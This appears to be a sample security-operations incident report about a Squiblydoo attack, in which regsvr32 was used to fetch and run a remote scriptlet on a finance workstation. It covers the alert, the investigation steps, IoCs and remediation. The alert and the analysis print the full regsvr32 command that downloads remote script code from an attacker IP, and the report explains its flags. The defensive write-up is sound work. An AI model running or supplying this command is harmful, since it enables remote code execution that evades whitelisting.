CrowdStrike Alert Details
Alert ID: CS-REGSVR32-PROXY-1218-7842 Alert Time: 2024-03-10 09:30:15 EST Severity: HIGH (85/100) Source: CrowdStrike Falcon EDR Rule: “Regsvr32.exe Executing Remote COM Object – Potential Squiblydoo” MITRE ATT&CK: T1218.010 – System Binary Proxy Execution: Regsvr32
Alert Details:
Detection: Regsvr32.exe used to execute remote scriptlet (Squiblydoo technique)
Host: FIN-WS-078 (Finance Workstation) User: bturner@company.com (Brian Turner, Accountant) Time: 09:25 EST
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
regsvr32.exe (PID: 4792)
Command: regsvr32.exe /s /n /u /i:http://185.143.221[.]89/payload.sct scrobj.dll
Command Line: regsvr32 /s /n /u /i:http://185.143.221[.]89/payload.sct scrobj.dll
Detection Logic:
Regsvr32.exe used with /i flag pointing to remote URL (anomalous)
Downloading scriptlet (.sct) from external IP
scrobj.dll (COM scriptlet) loaded
Parent process cmd.exe (unusual for legitimate regsvr32 usage)
Pattern matches “Squiblydoo” technique for executing arbitrary code via trusted binary
Additional Context:
User received phishing email with link earlier
URL payload.sct contains malicious script
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed regsvr32 remote scriptlet execution
2. URL Analysis
Fetch and analyze payload.sct
URLScan.io, Sandbox
SCT file contains PowerShell download cradle
3. Process Investigation
Identify source
CrowdStrike
User clicked link in email, launched cmd
4. User Interview
Contact bturner
Teams, Phone
User clicked “document” link; unaware
5. Immediate Action
Terminate regsvr32 process
CrowdStrike
Process killed
6. Network Block
Block malicious URL
Palo Alto, Zscaler
URL and IP blocked
Jira Incident Report
Ticket: SOC-2024-196 Summary: T1218.010 – Regsvr32 Squiblydoo Technique Executing Remote Scriptlet Status: RESOLVED Resolution: MALICIOUS – Process Terminated Priority: P2 – MEDIUM Labels: T1218, regsvr32, squiblydoo, proxy-execution, crowdstrike Components: Endpoint-Security, Web-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Regsvr32.exe Executing Remote COM Object – Potential Squiblydoo”.
Host: FIN-WS-078 (Finance, user bturner).
Process: regsvr32.exe with remote scriptlet.
Time: 2024-03-10 09:30 EST.
Technique: MITRE ATT&CK T1218.010 – System Binary Proxy Execution: Regsvr32.
2. Technical Analysis:
Attack Chain:
09:10 – User receives phishing email with link
09:12 – User clicks link
09:13 – Browser triggers cmd.exe (or downloads script that launches cmd)
09:14 – cmd.exe launches regsvr32 with remote scriptlet URL
09:15 – regsvr32 downloads payload.sct from 185.143.221[.]89
09:20 – Scriptlet executes PowerShell (downloading Cobalt Strike)
09:25 – CrowdStrike detects
Regsvr32 Technique:
Binary: C:\Windows\System32\regsvr32.exe (trusted, often allowed)
Flags: /s (silent), /n (no register), /u (unregister), /i:
DLL: scrobj.dll (COM scriptlet handler)
Effect: Downloads and executes scriptlet (.sct) which can contain arbitrary script
Payload Analysis:
URL: http://185.143.221[.]89/payload.sct
Content: XML scriptlet with embedded VBScript that runs PowerShell
PowerShell: Downloads and executes Cobalt Strike beacon
Impact:
Scriptlet executed before detection
C2 connection attempted (blocked)
3. Investigation Findings:
Timeline:
09:10 – Email received
09:12 – Link clicked
09:14-09:20 – Scriptlet download and execution
09:25 – Alert
09:27 – SOC investigates
09:28 – Process terminated
Indicators of Compromise (IoCs):
Network:
– URL: http://185.143.221[.]89/payload.sct
– IP: 185.143.221[.]89
Processes:
– regsvr32.exe with /i flag to remote URL
4. Containment Actions:
Immediate Actions:
Terminated regsvr32 process.
Blocked URL and IP at firewall and proxy.
Isolated host temporarily.
Reset user password.
Host Remediation:
Full scan (clean).
No reimage needed.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
No web filtering blocking malicious domain.
Regsvr32 allowed to download remote content.
6. Business Impact:
Operational Impact: Finance workstation offline for 1 hour.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Malicious process terminated.
User educated.
Technical Controls Enhanced:
Blocked regsvr32 from making outbound connections via firewall.
Enhanced URL filtering.
Created alert for regsvr32 with /i flag.
8. Conclusion:
An attacker used regsvr32.exe with the Squiblydoo technique to download and execute a malicious scriptlet, bypassing application whitelisting. CrowdStrike detected the anomalous behavior and terminated the process.
Closure Rationale: Process terminated; URL blocked; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-10 10:30 EST